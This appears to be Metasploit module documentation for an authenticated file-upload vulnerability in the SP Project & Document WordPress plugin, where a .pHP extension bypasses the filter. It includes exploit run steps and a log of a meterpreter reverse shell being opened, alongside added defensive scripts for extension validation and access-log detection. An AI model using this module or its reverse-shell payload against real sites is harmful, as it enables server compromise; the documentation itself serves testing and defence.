## Vulnerable Application

### Description

This module allows an attacker with a privileged WordPress account to launch a reverse shell
due to an arbitrary file upload vulnerability in the WordPress plugin SP Project & Document < 4.22.
The security check only looks for lowercase file extensions such as `.php`, so a file with a mixed-case extension such as `.pHP` is accepted for upload.
The uploaded payload can then be triggered by a request to `/wp-content/uploads/sp-client-document-manager/<user_id>/my_payload.php`.
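The root cause described above is a case-sensitive extension comparison. The following script, added here as an illustration and not taken from the plugin or the module, places a check with that flaw beside a hardened version that lower-cases the final extension and accepts only an allowlist of document types. The allowlist contents and the file names are assumptions for the example; only `.php` and `.pHP` come from the description.

```python
import os

# Case-sensitive blocklist, modelled on the flaw described above: only an
# exact lowercase ".php" suffix is rejected. (Constructed for this example.)
BLOCKED_EXTENSIONS = {".php"}

# Document types the upload handler should accept. This allowlist is an
# assumption for the example; the plugin's own list is not on the page.
ALLOWED_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".png", ".jpg"}


def weak_is_allowed(filename: str) -> bool:
    """Reproduce the flawed logic: compare the extension exactly as given,
    without normalising case, against a blocklist. 'x.pHP' != 'x.php', so it passes."""
    _, ext = os.path.splitext(os.path.basename(filename))
    return ext not in BLOCKED_EXTENSIONS


def hardened_is_allowed(filename: str) -> bool:
    """Lower-case the final extension and require it to be on an allowlist.
    Unknown types are rejected by default, so letter-case variants no longer matter."""
    base = os.path.basename(filename)
    if not base or base.startswith("."):
        return False          # empty name or dotfile-style name
    _, ext = os.path.splitext(base)
    if not ext:
        return False          # no extension at all
    return ext.lower() in ALLOWED_EXTENSIONS


def compare(filenames):
    """Return {filename: (weak_verdict, hardened_verdict)} for a batch of names."""
    return {f: (weak_is_allowed(f), hardened_is_allowed(f)) for f in filenames}


if __name__ == "__main__":
    # Names taken from the description above plus one benign document.
    for name, (weak, hard) in compare(["report.pdf", "my_payload.php", "ejtfh.pHP"]).items():
        print(f"{name:16} weak: {'accept' if weak else 'reject':7} "
              f"hardened: {'accept' if hard else 'reject'}")
```

The allowlist decides on the last extension only, so it should be paired with web-server configuration that refuses to execute scripts from the upload directory at all; the extension check alone is one layer, not the whole defence.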

### Installation

You can easily install WordPress with Docker as explained [there](https://upcloud.com/community/tutorials/wordpress-with-docker/).
Then, you can download a vulnerable version of the SP Project & Document plugin from [here](https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip)
and install it on your WordPress website through the plugin page: Add New > Upload Plugin > Browse...

## Verification Steps

1. Start `msfconsole`
2. `use exploit/multi/http/wordpress_plugin_sp_project_document_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_wordpress>` if the base path of the WordPress website is different from `/`
6. `check` to check whether the targeted WordPress website is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell

## Options

### USERNAME

Set the USERNAME of your admin account.

### PASSWORD

Set the PASSWORD of your admin account.

## Scenarios

This module was successfully tested on Debian 10 with WordPress 5.7.2 and SP Project & Document 4.21.
See the following output:

```
msf6 > use wordpress_plugin_sp_project_document_manager
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set rhost 192.168.1.35
rhost => 192.168.1.35
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set username admin
username => admin
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set password your_best_password
password => your_best_password
msf6 exploit(wordpress_plugin_sp_project_document_manager) > run

[*] Started reverse TCP handler on 192.168.1.28:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Version 4.21 of plugin SP Project & Document Manager found !
[+] The target is vulnerable. This version of SP Project & Document Manager is vulnerable !
[*] Uploading file 'ejtfh.pHP' containing the payload...
[*] Sending stage (39282 bytes) to 192.168.1.35
[*] Meterpreter session 4 opened (192.168.1.28:4444 -> 192.168.1.35:59938) at 2021-07-09 11:41:25 +0200
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.1.35
[*] Meterpreter session 5 opened (192.168.1.28:4444 -> 192.168.1.35:59940) at 2021-07-09 11:41:45 +0200

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo 
Computer    : 217a92584fbf
OS          : Linux 217a92584fbf 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
Meterpreter : php/linux
meterpreter > 
```
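The transcript above shows the uploaded file (`ejtfh.pHP`) being fetched directly from the upload directory to trigger the payload, which leaves a visible trace in the web server's access log. The following script, added here as a detection example and not part of the module or the plugin, scans access-log lines for requests to a PHP file (in any letter case) under the trigger path given in the description. The log lines are constructed for the example, and the combined-log regex is an assumption about the server's log format.

```python
import re
from urllib.parse import unquote, urlsplit

# Trigger path from the description: one folder per WordPress user id under
# this prefix, and a script placed there is reachable directly by URL.
UPLOAD_PREFIX = "/wp-content/uploads/sp-client-document-manager/"

# Apache/nginx "combined" log format (assumed for the example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Match a ".php" suffix regardless of letter case, the bypass the page describes.
SCRIPT_EXT_RE = re.compile(r'\.php$', re.IGNORECASE)


def parse_line(line):
    """Return a dict for a well-formed log line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def is_suspicious(rec):
    """True when the request path is a PHP file under the document-manager upload tree."""
    path = unquote(urlsplit(rec["target"]).path)   # drop query string, decode %xx
    if not path.startswith(UPLOAD_PREFIX):
        return False
    parts = path[len(UPLOAD_PREFIX):].split("/")
    if len(parts) < 2:                              # expect <user_id>/<file>
        return False
    return bool(SCRIPT_EXT_RE.search(parts[-1]))


def find_suspicious(lines):
    """Return (client_ip, request_target, status) for each flagged request."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_suspicious(rec):
            hits.append((rec["ip"], rec["target"], rec["status"]))
    return hits


# Constructed sample log: two trigger requests, three benign ones, one junk line.
SAMPLE_LOG = """\
192.168.1.28 - - [09/Jul/2021:11:41:20 +0200] "GET /wp-content/uploads/sp-client-document-manager/1/report.pdf HTTP/1.1" 200 5120
192.168.1.28 - - [09/Jul/2021:11:41:45 +0200] "GET /wp-content/uploads/sp-client-document-manager/1/ejtfh.pHP HTTP/1.1" 200 0
192.168.1.28 - - [09/Jul/2021:11:42:01 +0200] "GET /wp-content/uploads/sp-client-document-manager/1/ejtfh.pHP?x=1 HTTP/1.1" 200 0
10.0.0.5 - - [09/Jul/2021:11:43:00 +0200] "GET /wp-content/uploads/2021/07/photo.jpg HTTP/1.1" 200 8192
10.0.0.5 - - [09/Jul/2021:11:44:00 +0200] "GET /index.php HTTP/1.1" 200 1024
this line is not in combined log format
""".splitlines()

if __name__ == "__main__":
    for ip, target, status in find_suspicious(SAMPLE_LOG):
        print(f"ALERT {ip} requested {target} -> {status}")
```

Any successful PHP execution from the upload tree is worth an alert on its own; a `200` on such a path means the server executed or served a script from a directory that should only ever hold documents.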
